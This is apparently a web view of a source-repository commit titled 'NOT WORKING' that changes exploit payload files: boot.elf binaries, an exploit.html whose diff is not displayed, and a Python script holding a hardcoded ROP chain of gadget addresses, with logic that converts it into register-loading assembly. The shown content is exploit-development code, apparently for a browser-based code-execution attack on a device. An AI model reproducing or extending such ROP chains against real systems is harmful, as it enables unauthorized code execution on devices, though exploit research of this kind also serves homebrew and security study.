瀏覽代碼

NOT WORKING

pull/2/head
Winbagility 2 年之前
父節點
當前提交
e5f1d8658c
共有 4 個文件被更改,包括 9 次插入3 次删除
  1. 二進制
      payload/boot.elf
  2. 二進制
      payload/boot_.elf
  3. +2
    -2
      payload/exploit.html
  4. +7
    -1
      ropChainToAsm.py

二進制
payload/boot.elf 查看文件


二進制
payload/boot_.elf 查看文件


+ 2
- 2
payload/exploit.html
文件差異過大導致無法顯示
查看文件


+ 7
- 1
ropChainToAsm.py 查看文件

@@ -10,7 +10,13 @@
# ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
ropChainAddresses = ['00000000', '00000001', '010204C8', '01023F88', '010240B0', '01035FC8', '010376C0', '0107DD70', '01080274', '01800000', 'FFFF2222', 'FFFF3333']

#Generate a list of each value used in the ROP chain for optimization purposes
#Cause no need to load the value in multiple times
ropChainAddresses = []
for i in ropChain:
if not i in ropChainAddresses:
ropChainAddresses.append(i)

# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size


Loading…
取消
儲存